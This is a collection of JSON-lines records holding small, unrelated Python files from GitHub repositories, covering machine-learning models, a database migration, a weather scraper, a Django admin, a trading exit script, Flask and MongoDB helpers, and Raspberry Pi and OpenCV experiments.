+{"seq_id":"11857684544","text":"import glob\nimport numpy\nimport CNNTransform\n\nresnet = CNNTransform.resnet18()\n\ndef dist_prob(a, x):\n d = numpy.exp(((a - x)**2).sum(1))\n return d / d.sum()\n\nclass DeepMatch():\n def __init__(self, vector_dir=\"vectors\"):\n files = glob.glob(vector_dir + \"/*.csv\")\n labels = []\n V = []\n\n for f in files:\n print(\"Loading: \", f)\n labels.append(f.split(\"/\")[-1].split(\".\")[0])\n V.append(numpy.loadtxt(f, delimiter=\",\"))\n\n self.V = numpy.vstack(V)\n self.labels = numpy.hstack(labels)\n\n def predict(self, X):\n T = resnet.transform(X)\n\n # similarity\n D = [dist_prob(self.V, x).ravel() for x in T.detach().numpy()]\n\n p = []\n for d in D:\n idx = d.argsort()[:5]\n p.append(dict(zip(self.labels[idx], d[idx].tolist())))\n print(p)\n return p\n\n\nif __name__ == '__main__':\n from optparse import OptionParser\n\n parser = OptionParser()\n parser.add_option(\"-i\", \"--image\", dest=\"image\",\n help=\"Path to image\")\n","repo_name":"radolalaina/deeplearning","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"38345208009","text":"# File: Untrained CNN\r\n# Description: This program allows the user to train and save a new CNN.\r\n# Institution: University of Texas at Austin, Department of Biomedical Engineering\r\n# Developer: Shao-Po (Shawn) Huang\r\n# Team Members: Bryce Carr, Ajay Gadwal, Ethan Muyskens, Christian Schonhoeft\r\n\r\n# Date Last Modified: 05/11/20\r\n\r\n# This program uses keras and joblib.\r\n\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\nfrom keras.layers import Flatten\r\nfrom keras.layers import Dropout\r\nfrom keras.layers.convolutional import Conv1D\r\nfrom keras.layers.convolutional import MaxPooling1D\r\nfrom keras.utils import to_categorical\r\nimport joblib\r\n\r\n# Helpful resource for building convolutional neural network:\r\n# https://machinelearningmastery.com/cnn-models-for-human-activity-recognition-time-series-classification/\r\n\r\n# Documentation for keras:\r\n# https://keras.io/\r\n\r\n# Source for CNN design:\r\n# Yildirim O, Baloglu UB, Acharya UR. A Deep Learning Model for Automated Sleep Stages Classification Using PSG Signals.\r\n# Int J Environ Res Public Health. 2019;16(4):599. Published 2019 Feb 19. doi:10.3390/ijerph16040599\r\n\r\n# Build the CNN\r\nn_timesteps, n_features, n_outputs = trainX.shape[1], trainX.shape[2], trainy.shape[1]\r\nmodel = Sequential()\r\nmodel.add(Conv1D(filters=64, kernel_size=5, strides=3, activation='relu', input_shape=(n_timesteps,n_features)))\r\nmodel.add(Conv1D(filters=128, kernel_size=5, strides=1, activation='relu'))\r\nmodel.add(MaxPooling1D(pool_size=2, strides=2))\r\nmodel.add(Dropout(0.2))\r\nmodel.add(Conv1D(filters=128, kernel_size=13, strides=1, activation='relu'))\r\nmodel.add(Conv1D(filters=256, kernel_size=7, strides=1, activation='relu'))\r\nmodel.add(MaxPooling1D(pool_size=2, strides=2))\r\nmodel.add(Conv1D(filters=256, kernel_size=7, strides=1, activation='relu'))\r\nmodel.add(Conv1D(filters=64, kernel_size=4, strides=1, activation='relu')) \r\nmodel.add(MaxPooling1D(pool_size=2, strides=2))\r\nmodel.add(Conv1D(filters=32, kernel_size=3, strides=1, activation='relu'))\r\nmodel.add(Conv1D(filters=64, kernel_size=6, strides=1, activation='relu'))\r\nmodel.add(MaxPooling1D(pool_size=2, strides=2))\r\nmodel.add(Conv1D(filters=8, kernel_size=5, strides=1, activation='relu'))\r\nmodel.add(Conv1D(filters=8, kernel_size=2, strides=1, activation='relu'))\r\nmodel.add(MaxPooling1D(pool_size=2, strides=2))\r\nmodel.add(Flatten())\r\nmodel.add(Dense(64, activation='relu'))\r\nmodel.add(Dropout(0.2))\r\nmodel.add(Dense(n_outputs, activation='softmax'))\r\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\r\n\r\n# Fit the CNN\r\nmodel.fit(trainX, trainy, epochs=100, verbose=2, batch_size=32)\r\n\r\n# Save trained CNN by providing destination\r\njoblib.dump(model,PATH_CNN)\r\n","repo_name":"shawnh871/Sleep_Stage_Classification","sub_path":"Untrained_CNN.py","file_name":"Untrained_CNN.py","file_ext":"py","file_size_in_byte":2732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"23089104183","text":"\"\"\"add category, message_type and message table\n\nRevision ID: 27ce67ba5f4d\nRevises: 0dbc42ae52bd\nCreate Date: 2020-08-04 20:40:09.626568\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '27ce67ba5f4d'\ndown_revision = '0dbc42ae52bd'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('categories',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('c_name', sa.String(length=50), nullable=False),\n sa.Column('c_descripton', sa.String(length=100), nullable=True),\n sa.Column('c_thumbnail', sa.String(length=50), nullable=True),\n sa.Column('created_at', sa.DateTime(), server_default=sa.text('now()'), nullable=True),\n sa.Column('updated_at', sa.DateTime(), server_default=sa.text('now()'), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('message_types',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('t_name', sa.String(length=50), nullable=False),\n sa.Column('t_description', sa.String(length=100), nullable=True),\n sa.Column('created_at', sa.DateTime(), server_default=sa.text('now()'), nullable=True),\n sa.Column('updated_at', sa.DateTime(), server_default=sa.text('now()'), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('messages',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('m_title', sa.String(length=100), nullable=True),\n sa.Column('m_description', sa.String(length=200), nullable=True),\n sa.Column('type_id', sa.Integer(), nullable=False),\n sa.Column('m_thumbnail', sa.String(length=100), nullable=True),\n sa.Column('m_link', sa.String(length=200), nullable=True),\n sa.Column('m_duration', sa.String(length=50), nullable=True),\n sa.Column('m_broadcast', sa.Boolean(), nullable=False),\n sa.Column('created_at', sa.DateTime(), server_default=sa.text('now()'), nullable=True),\n sa.Column('updated_at', sa.DateTime(), server_default=sa.text('now()'), nullable=True),\n sa.ForeignKeyConstraint(['type_id'], ['message_types.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('messages_categories',\n sa.Column('message_id', sa.Integer(), nullable=False),\n sa.Column('category_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['category_id'], ['categories.id'], ),\n sa.ForeignKeyConstraint(['message_id'], ['messages.id'], ),\n sa.PrimaryKeyConstraint('message_id', 'category_id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('messages_categories')\n op.drop_table('messages')\n op.drop_table('message_types')\n op.drop_table('categories')\n # ### end Alembic commands ###\n","repo_name":"pat64j/dante-backend","sub_path":"migrations/versions/27ce67ba5f4d_add_category_message_type_and_message_.py","file_name":"27ce67ba5f4d_add_category_message_type_and_message_.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"35851290015","text":"\"\"\"\nThe methods here are taken from Liu et al\nhttps://github.com/fengliu90/DK-for-TST/blob/master/Baselines_Blob.py\n\"\"\"\nfrom sklearn.utils import check_random_state\nfrom argparse import Namespace\nimport argparse\nimport os\nimport numpy as np\nimport torchvision.transforms as transforms\nimport torchvision.transforms.functional as TF\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport torch\nimport pickle\nfrom tqdm.auto import tqdm\nfrom utils_HD import MatConvert, MMDu, TST_MMD_u\nfrom mmdvar import IncomMMDVar, ComMMDVar, h1_mean_var_gram\n\n# Setup seeds\nnp.random.seed(1102)\ntorch.manual_seed(1102)\ntorch.cuda.manual_seed(1102)\ntorch.backends.cudnn.deterministic = True\nis_cuda = True\n\ndtype = torch.float\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else 'cpu')\ncuda = True if torch.cuda.is_available() else False\n\n\ndef deep_mmd_not_image(sample_p, sample_q, use_1sample_U, complete, n_epochs=1000):\n assert sample_p.shape[1] == sample_q.shape[1]\n sample_p = np.array(sample_p, dtype='float32')\n sample_q = np.array(sample_q, dtype='float32')\n \n # Setup for all experiments\n alpha = 0.05 # test threshold\n x_in = sample_p.shape[1] # number of neurons in the input layer, i.e., dimension of data\n H = 50 # number of neurons in the hidden layer\n x_out = 50 # number of neurons in the output layer\n learning_rate = 0.0005 # learning rate for MMD-D on Blob\n N_epoch = n_epochs # number of training epochs\n\n # prepare datasets\n sample_p = torch.from_numpy(sample_p)\n sample_q = torch.from_numpy(sample_q)\n \n # split data 50/50\n x_train, x_test = sample_p[:len(sample_p)//2], sample_p[len(sample_p)//2:]\n y_train, y_test = sample_q[:len(sample_q) // 2], sample_q[len(sample_q) // 2:]\n\n # Initialize parameters\n model_u = ModelLatentF(x_in, H, x_out)\n if cuda:\n model_u.cuda()\n epsilonOPT = MatConvert(np.random.rand(1) * (10 ** (-10)), device, dtype)\n epsilonOPT.requires_grad = True\n sigmaOPT = MatConvert(np.sqrt(np.random.rand(1) * 0.3), device, dtype)\n sigmaOPT.requires_grad = True\n sigma0OPT = MatConvert(np.sqrt(np.random.rand(1) * 0.002), device, dtype)\n sigma0OPT.requires_grad = True\n\n # Setup optimizer for training deep kernel\n optimizer_u = torch.optim.Adam(list(model_u.parameters())+[epsilonOPT]+[sigmaOPT]+[sigma0OPT], lr=learning_rate) #\n\n # Train deep kernel to maximize test power\n S = torch.cat([x_train.cpu(), y_train.cpu()], 0).to(device)\n # S = MatConvert(S, device, dtype)\n N1 = len(x_train)\n np.random.seed(seed=1102)\n torch.manual_seed(1102)\n torch.cuda.manual_seed(1102)\n for t in tqdm(range(N_epoch)):\n # Compute epsilon, sigma and sigma_0\n ep = torch.exp(epsilonOPT)/(1+torch.exp(epsilonOPT))\n sigma = sigmaOPT ** 2\n sigma0_u = sigma0OPT ** 2\n # Compute output of the deep network\n modelu_output = model_u(S)\n # Compute J (STAT_u)\n TEMP = MMDu(modelu_output, N1, S, sigma, sigma0_u, ep, use_1sample_U=use_1sample_U, complete=complete)\n mmd_value_temp = -1 * TEMP[0]\n mmd_std_temp = torch.sqrt(TEMP[1]+10**(-6))\n STAT_u = torch.div(mmd_value_temp, mmd_std_temp)\n # Initialize optimizer and Compute gradient\n optimizer_u.zero_grad()\n STAT_u.backward(retain_graph=True)\n # Update weights using gradient descent\n optimizer_u.step()\n\n # Compute test power of deep kernel based MMD\n S = torch.cat([x_test.cpu(), y_test.cpu()], 0).to(device)\n # S = MatConvert(S, device, dtype)\n N1 = len(x_test)\n N_per = 500\n alpha = 0.05\n # MMD-D\n dec, pvalue, _ = TST_MMD_u(model_u(S), N_per, N1, S, sigma, sigma0_u, ep, alpha, device, dtype, use_1sample_U=use_1sample_U, complete=complete)\n return dec\n\n\nclass ModelLatentF(torch.nn.Module):\n \"\"\"Latent space for both domains.\"\"\"\n def __init__(self, x_in, H, x_out):\n \"\"\"Init latent features.\"\"\"\n super(ModelLatentF, self).__init__()\n self.restored = False\n self.latent = torch.nn.Sequential(\n torch.nn.Linear(x_in, H, bias=True),\n torch.nn.Softplus(),\n torch.nn.Linear(H, H, bias=True),\n torch.nn.Softplus(),\n torch.nn.Linear(H, H, bias=True),\n torch.nn.Softplus(),\n torch.nn.Linear(H, x_out, bias=True),\n )\n def forward(self, input):\n \"\"\"Forward the LeNet.\"\"\"\n fealant = self.latent(input)\n return fealant","repo_name":"sumahn/c2st","sub_path":"MMD/ts_tests/deep_mmd_not_image.py","file_name":"deep_mmd_not_image.py","file_ext":"py","file_size_in_byte":4561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"45720450858","text":"import requests\nimport urllib.request\nimport time\nimport csv\nfrom bs4 import BeautifulSoup\nimport sched, time\nfrom datetime import datetime\nfrom yoo_telegram import Notifier\nimport pygsheets\nfrom config import BOT_TOKEN, TELEGRAM_USER\n\n\nclient = Notifier(BOT_TOKEN)\ngc = pygsheets.authorize(\n service_file=\"keys/bratislava-weather-trends-b9b47037fa19.json\"\n)\nSECONDS = 60 * 60\n\n\ndef getData(sc):\n try:\n sh = gc.open(\"weather-data\")\n wks = sh.sheet1\n\n url = \"http://www.shmu.sk/sk/?page=59\"\n response = requests.get(url)\n soup = BeautifulSoup(response.text, \"html.parser\")\n timeNow = datetime.now().strftime(\"%Y/%m/%d %H:%M\")\n for row in soup.findAll(\"table\")[0].find_all(\"tr\"):\n columns = row.find_all(\"td\")\n if columns[0].text not in (\n \"Bratislava - Mlynská Dolina\",\n \"Bratislava Koliba\",\n ):\n continue\n else:\n station = columns[0].text.strip()\n temperature = columns[1].text.strip().split(\" \")[0]\n wind_dir = columns[2].text.strip()\n wind_speed = columns[3].text.strip().split(\" \")[0]\n wind_gusts = columns[4].text.strip()\n pressure = columns[5].text.strip().split(\" \")[0]\n clouds = columns[6].text.strip()\n weather = columns[7].text.strip()\n\n wks.insert_rows(\n 1,\n number=1,\n values=[\n timeNow,\n station,\n temperature,\n wind_dir,\n wind_speed,\n wind_gusts,\n pressure,\n clouds,\n weather,\n ],\n inherit=False,\n )\n sc.enter(SECONDS, 1, getData, (sc,))\n except Exception as e:\n timeErr = datetime.now().strftime(\"%Y/%m/%d %H:%M\")\n e_msg = f\"{timeErr} - Bratislava weather - {str(e)}\"\n client.sendMessage(TELEGRAM_USER, e_msg)\n sc.enter(SECONDS, 1, getData, (sc,))\n\n\ndef main():\n s = sched.scheduler(time.time, time.sleep)\n try:\n s.enter(SECONDS, 1, getData, (s,))\n s.run()\n except Exception as e:\n timeErr = datetime.now().strftime(\"%Y/%m/%d %H:%M\")\n e_msg = f\"{timeErr} - Bratislava weather - {str(e)}\"\n client.sendMessage(TELEGRAM_USER, e_msg)\n \n\nif __name__ == \"__main__\":\n main()\n","repo_name":"williambrach/Bratislava-weather-trends","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"71807499243","text":"class BasketballPlayer():\n def __init__(self, team, first_name, last_name, height_cm, weight_kg, points, rebounds, assists, triple_doubles):\n self.team = team\n self.first_name = first_name\n self.last_name = last_name\n self.height_cm = height_cm\n self.weight_cm = weight_kg\n self.points = points\n self.rebounds = rebounds\n self.assists = assists\n self.triple_doubles = triple_doubles\n\n\nprint(\"Build your own NBA team with adding your own favorite players!\")\n\nnew_player = BasketballPlayer(\n team=input(\"Enter player team: \"),\n first_name=input(\"First name: \"),\n last_name=input(\"Last name: \"),\n height_cm=input(\"Height in centimeters: \"),\n weight_kg=input(\"Weight in kilograms: \"),\n points=input(\"Points: \"),\n rebounds=input(\"Rebounds: \"),\n assists=input(\"Assists: \"),\n triple_doubles=input(\"Triple doubles: \")\n)\n\nwith open(\"player.txt\", \"w\") as player_file:\n player_file.write(str(new_player.__dict__))\n\nprint(\"Player added!\")","repo_name":"jaxtothemax/PythonHomework_13","sub_path":"Add_Player/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"18856698610","text":"stack = []\n\ndef isEmpty():\n if len(stack) == 0:\n return True\n else:\n return False\n\ndef push(n):\n stack.append(n)\n\ndef pop():\n if isEmpty():\n print(\"Stack is empty.\")\n else:\n stack.pop()\n\ndef display():\n if isEmpty():\n print (\"Stack is empty\")\n else:\n print (stack)\n\nwhile True:\n choice = int (input(\"Make a choice: \"))\n if choice == 1:\n num = int(input(\"Enter an element to be input in the stack: \"))\n push(num)\n elif choice == 2:\n pop()\n elif choice == 3:\n display()","repo_name":"Advaitmenon1106/backup","sub_path":"Py/Data Structures in Python/stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"14476275797","text":"# -*- coding: utf-8 -*-\n\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.template.response import TemplateResponse\nfrom django.core.urlresolvers import reverse\nfrom django.conf.urls import patterns, url\nfrom django.shortcuts import redirect\nfrom django.contrib import admin\nfrom dbsnapshot import models\n\n\nclass ServerAdmin(admin.ModelAdmin):\n list_display = (\n 'host', 'port', 'status', 'remote_status', 'remote_list_num',\n 'days', 'per_day', 'created', 'updated', 'actions_column', 'id',)\n search_fields = ('host',)\n list_filter = ('status', 'created', 'updated',)\n\n def __init__(self, *args, **kwargs):\n super(ServerAdmin, self).__init__(*args, **kwargs)\n self._col_inst = None\n\n def _get_link(self, title, view_name):\n return '[%s] ' % (\n reverse('admin:%s' % view_name, args=(self._col_inst.pk,),\n current_app=self.admin_site.name),\n unicode(title)\n )\n\n def actions_column(self, instance, actions=''):\n self._col_inst = instance\n actions += self._get_link(_('backup'), 'backup_view')\n actions += self._get_link(_('clean'), 'clean_view')\n actions += self._get_link(_('list of backups'), 'backup_list')\n return actions\n\n actions_column.short_description = _('Actions')\n actions_column.allow_tags = True\n\n def _server_view(self, request, pk, template, extra_context=None):\n context = {\n 'server': models.Server.objects.get(pk=pk),\n 'app_label': models.Server._meta.app_label,\n 'verbose_name': unicode(models.Server._meta.verbose_name),\n }\n if extra_context is not None:\n context.update(extra_context)\n return TemplateResponse(\n request, 'dbsnapshot/admin/%s.html' % template, context,\n current_app=self.admin_site.name)\n\n def backup_view(self, request, pk):\n return self._server_view(request, pk, 'backup_view')\n\n def clean_view(self, request, pk):\n return self._server_view(request, pk, 'clean_view')\n\n def backup_list_view(self, request, pk):\n return self._server_view(request, pk, 'backup_list')\n\n def backup_delete_view(self, request, pk, filename):\n models.Server.objects.get(pk=pk).remote_delete(filename)\n return redirect(\n reverse(\n 'admin:backup_list', args=(pk,),\n current_app=self.admin_site.name\n )\n )\n\n def get_urls(self):\n urls = super(ServerAdmin, self).get_urls()\n\n admin_urls = patterns(\n '',\n url(\n r'^backup/(\\d+)/$',\n self.admin_site.admin_view(self.backup_view),\n name='backup_view'\n ),\n url(\n r'^backup/clean/(\\d+)/$',\n self.admin_site.admin_view(self.clean_view),\n name='clean_view'\n ),\n url(\n r'^backup/list/(\\d+)/$',\n self.admin_site.admin_view(self.backup_list_view),\n name='backup_list'\n ),\n url(\n r'^backup/delete/(\\d+)/(.*?)/$',\n self.admin_site.admin_view(self.backup_delete_view),\n name='backup_delete'\n ),\n )\n return admin_urls + urls\n\n\nclass BackupLogAdmin(admin.ModelAdmin):\n list_display = (\n 'server', 'method', 'start', 'end', 'elapsed',\n 'success', 'date', 'id',)\n date_hierarchy = 'date'\n search_fields = ('server__host',)\n list_filter = ('method', 'success', 'date',)\n\n def __init__(self, model, admin_site):\n super(BackupLogAdmin, self).__init__(model, admin_site)\n\n self.readonly_fields = [field.name for field in model._meta.fields]\n self.readonly_model = model\n\n def has_add_permission(self, request):\n return False\n\n def has_delete_permission(self, request, obj=None):\n return False\n\n def has_change_permission(self, request, obj=None):\n return request.method != 'POST'\n\n\nadmin.site.register(models.Server, ServerAdmin)\nadmin.site.register(models.Log, BackupLogAdmin)\n","repo_name":"LPgenerator/django-db-snapshot","sub_path":"dbsnapshot/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":4187,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"19"}
+{"seq_id":"25417100294","text":"from angel_api import Angel\nimport datetime\nimport time\nimport os\nfrom django.core.wsgi import get_wsgi_application\nos.environ['DJANGO_SETTINGS_MODULE'] = 'TradeXpress.settings'\napplication = get_wsgi_application()\nfrom Intellitrade.models import *\n\ndef trail_sl(entry_price, ltp, sl, trade):\n if ltp >= entry_price + sl or trade.sl_to_entry:\n if not trade.sl_to_entry:\n trade.sl_to_entry = True\n trade.save()\n sl = 0\n return sl\n\ndef exitOrder():\n try:\n active_trades = TradeSignal.objects.filter(is_active=True)\n active_users = Trader.objects.filter(is_active=True)\n if active_users is not None and len(active_users) > 0:\n angel = Angel(active_users[0].email)\n if active_trades is not None and len(active_trades)>0:\n for trade in active_trades:\n symbol_token = trade.symbol_token\n ltp = angel.getLtp(symbol_token)\n entry_price = trade.entry_price\n sl = StopLoss.objects.get(nifty_symbol=trade.nifty_symbol).price\n target = Target.objects.get(nifty_symbol=trade.nifty_symbol).price\n # trail sl to entry if ltp is greater than entry by sl \n sl = trail_sl(entry_price, ltp, sl, trade)\n if ltp >= entry_price + target or ltp <= entry_price - sl:\n trade.exit_price = ltp\n trade.exit_datetime = datetime.datetime.now()\n trade.save()\n for user in active_users:\n angel = Angel(user.email, trade)\n angel.exitOrder(ltp)\n except Exception as e:\n pass\n\nif __name__ == '__main__':\n while True:\n exitOrder()\n time.sleep(1)\n","repo_name":"gummadidala/tradeserver","sub_path":"TradeXpress/exit_order.py","file_name":"exit_order.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"18675820245","text":"from flask import Flask, request\nimport operations\n\napp = Flask(__name__)\n\n@app.route('/')\ndef hello_world():\n return \"Hello World\"\n\n@app.route('/sum', methods=['GET','POST'])\ndef sumCalculate():\n value_a=request.args.get('value_a')\n value_b=request.args.get('value_b')\n sum=operations.sum(value_a,value_b)\n return str(sum)\n\n@app.route('/queryparams',methods=['GET'])\ndef paramsDemo():\n name=request.args.get('name')\n return name\n\n@app.route('/postparams', methods=['POST'])\ndef postParamsDemo():\n params=request.json\n value_a=params[\"value_a\"]\n value_b=params[\"value_b\"]\n sum=operations.sum(value_a,value_b)\n return str(sum)\n\nif __name__=='__main__':\n app.run()","repo_name":"avirup171/Python-IoT","sub_path":"rest-api-server-flask/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"25220770549","text":"#!/usr/bin/env python3\n'''Module.\n'''\n\n\ndef update_topics(mongo_collection, name, topics):\n '''Function that changes all topics of a collection's document based on\n the name.\n '''\n mongo_collection.update_many(\n {'name': name},\n {'$set': {'topics': topics}}\n )\n","repo_name":"MosesSoftEng/alx-backend-storage","sub_path":"0x01-NoSQL/10-update_topics.py","file_name":"10-update_topics.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"}
+{"seq_id":"15159845054","text":"import requests\nimport json\n\n\ndef test_mikoservletpoc():\n url = 'http://miko3-aks-agic.miko2.co.in/mikoservletpoc/miko-servlet-poc/recommendation2'\n files = {'file': open('C://Users//basav//PycharmProjects//ApiIntegration_MIko//Testcases//test_miko-servlet-poc'\n '//servalet-poc data//withoutslot.txt', 'rb')}\n\n m = requests.get(url, files=files,)\n print(m.status_code)\n print(m.text)\n assert m.status_code == 200\n","repo_name":"basava761/miko_API","sub_path":"test_miko-servlet-poc/servalet-poc data/test_servaletpoc.py","file_name":"test_servaletpoc.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"31086721739","text":"from setuptools import find_packages\nfrom setuptools import setup\n\nwith open('README.md') as readme_file:\n readme = readme_file.read()\n\nrequirements = [\n 'Cython==0.29.13',\n 'Flask==1.1.1',\n 'flask-cors==3.0.8',\n 'gensim==3.8.0',\n 'lexrank==0.1.0',\n 'matplotlib==3.1.1',\n 'nltk==3.4.5',\n 'nose==1.3.7',\n 'numpy==1.17.2',\n 'pandas==0.25.1',\n 'scikit-learn==0.21.3',\n 'seaborn==0.9.0',\n 'spacy==2.1.8',\n 'swifter==0.295',\n 'tqdm==4.35.0',\n 'wheel'\n ]\n\n\nsetup(\n\n author=\"teddyauthors\",\n author_email='teddyauthors@gmail.com',\n classifiers=[\n 'Development Status :: 2 - Pre-Alpha',\n 'License :: OSI Approved :: Apache Software License',\n 'Natural Language :: English',\n 'Programming Language :: Python :: 3.6',\n ],\n description=\"\",\n install_requires=requirements,\n license=\"Apache Software License 2.0\",\n long_description=readme + '\\n\\n',\n include_package_data=True,\n name='Teddy',\n packages=find_packages(),\n setup_requires=requirements,\n test_suite='tests',\n tests_require=requirements,\n version='0.1.0',\n zip_safe=False,\n)\n","repo_name":"megagonlabs/teddy","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"19"}
+{"seq_id":"37694582919","text":"import time\nimport RPi.GPIO as GPIO\n\nGPIO.setmode(GPIO.BCM)\n\npin_coilA1 = 10\npin_coilA2 = 27\npin_coilB1 = 17\npin_coilB2 = 22\nLDR_PIN = 23\n\ndef motorSetup():\n GPIO.setup(pin_coilA1, GPIO.OUT)\n GPIO.setup(pin_coilA2, GPIO.OUT)\n GPIO.setup(pin_coilB1, GPIO.OUT)\n GPIO.setup(pin_coilB2, GPIO.OUT)\n\ndef motorFree():\n motorStep(0, 0, 0, 0)\n\ndef motorMove(steps, delay):\n if steps >= 0:\n for i in range(0, steps):\n motorStep(1, 0, 1, 0)\n time.sleep(delay)\n motorStep(0, 1, 1, 0)\n time.sleep(delay)\n motorStep(0, 1, 0, 1)\n time.sleep(delay)\n motorStep(1, 0, 0, 1)\n time.sleep(delay)\n else:\n for i in range(0, -steps):\n motorStep(1, 0, 1, 0)\n time.sleep(delay)\n motorStep(1, 0, 0, 1)\n time.sleep(delay)\n motorStep(0, 1, 0, 1)\n time.sleep(delay)\n motorStep(0, 1, 1, 0)\n time.sleep(delay)\n\ndef motorStep(a1, a2, b1, b2):\n GPIO.output(pin_coilA1, a1)\n GPIO.output(pin_coilA2, a2)\n GPIO.output(pin_coilB1, b1)\n GPIO.output(pin_coilB2, b2)\n\ndef ldr_value():\n value = 0\n GPIO.setup(LDR_PIN, GPIO.OUT)\n GPIO.setup(LDR_PIN, GPIO.LOW)\n time.sleep(0.1)\n start = time.time()\n GPIO.setup(LDR_PIN, GPIO.IN)\n while (GPIO.input(LDR_PIN) == GPIO.LOW):\n value += 1\n finish = time.time()\n duration = 1000 * (finish - start)\n return duration\n\nlightLevel = float(raw_input(\"Desired light level: \"))\n\nmotorSetup()\nmotorFree()\n\nmotorPosition = 64\n\ntry:\n while True:\n motorAdjust = 0\n ldr_val = ldr_value()\n print(\"LDR: %s\" % ldr_val)\n if ldr_val < lightLevel - 1:\n if motorPosition < 128:\n motorAdjust = 8\n motorPosition += motorAdjust\n print(\"Too bright, adjusting motor to %s\" % motorPosition)\n elif ldr_val > lightLevel + 1:\n if motorPosition > 0:\n motorAdjust = -8\n motorPosition += motorAdjust\n print(\"Too dim, adjusting motor to %s\" % motorPosition)\n else:\n print(\"Just right\")\n if motorAdjust == 0:\n time.sleep(0.25)\nexcept KeyboardInterrupt:\n pass\n\nGPIO.cleanup()\n\n","repo_name":"epic709/thinkerersA01","sub_path":"code/step_light.py","file_name":"step_light.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"43353476907","text":"from django.db import models\nfrom Accounts.models import User\nfrom os import path,remove\nfrom cloudX.settings import MEDIA_ROOT\nfrom cloudX.settings import domain\n\n_types = [\n ('sports','Sports'),\n ('tech','Technical'),\n ('cultural','Cultural'),\n ('other','Other'),\n]\n\n# Create your models here.\n\nclass Data(models.Model):\n title = models.CharField(max_length=225)\n user = models.ForeignKey(to = User,on_delete=models.CASCADE)\n description = models.TextField(null=True,blank=True)\n link = models.TextField(null=True,blank=True)\n type = models.CharField(max_length=10,choices=_types)\n file = models.FileField(upload_to='data/')\n date = models.DateField()\n \n def extension(self):\n name, extension = path.splitext(self.file.name)\n return extension\n \n def delete(self, *args, **kwargs):\n remove(path.join(MEDIA_ROOT, self.file.name))\n super(Data,self).delete(*args,**kwargs)\n","repo_name":"KhushalJangid/cloudX","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"72047330922","text":"#!/usr/bin/python3\n\nimport cv2\nimport numpy as np\n\ncap = cv2.VideoCapture(0)\nwhile cap.isOpened():\n\t_ , img = cap.read()\n\tgray = cv2.cvtColor(img , cv2.COLOR_BGR2GRAY)\n\n# LAPLACIAN 2nd argument is datatype 64 float , 3rd argument is kernel size , it is optional\n\tlap = cv2.Laplacian(gray , cv2.CV_64F , ksize=5)\n\t\n# SobelX 2nd arg is datatype 64 float 3rd is value of dx and 4th is dy\n\tsobelX = cv2.Sobel(gray , cv2.CV_64F , 1 ,0)\n\tsobelX = np.uint8(np.absolute(sobelX))\n\n# SObelY\n\tsobelY = cv2.Sobel(gray , cv2.CV_64F , 0 ,1)\n\tsobelY = np.uint8(np.absolute(sobelY))\n\n# Sobel Combined\n\tsobel_com = cv2.bitwise_or(sobelX ,sobelY)\n# Converting into Uint8\n\tlap = np.uint8(np.absolute(lap))\n\t\t\n\tcv2.imshow('laplacian', lap)\n\tcv2.imshow('SobelX', sobelX)\n\tcv2.imshow('Sobel_Y', sobelY)\n\tcv2.imshow('Sobel_Com', sobel_com)\n\tcv2.imshow('Gray', gray)\n#image = [img,dst,blur,gblur,median,bilateral]\n\tif cv2.waitKey(1) == 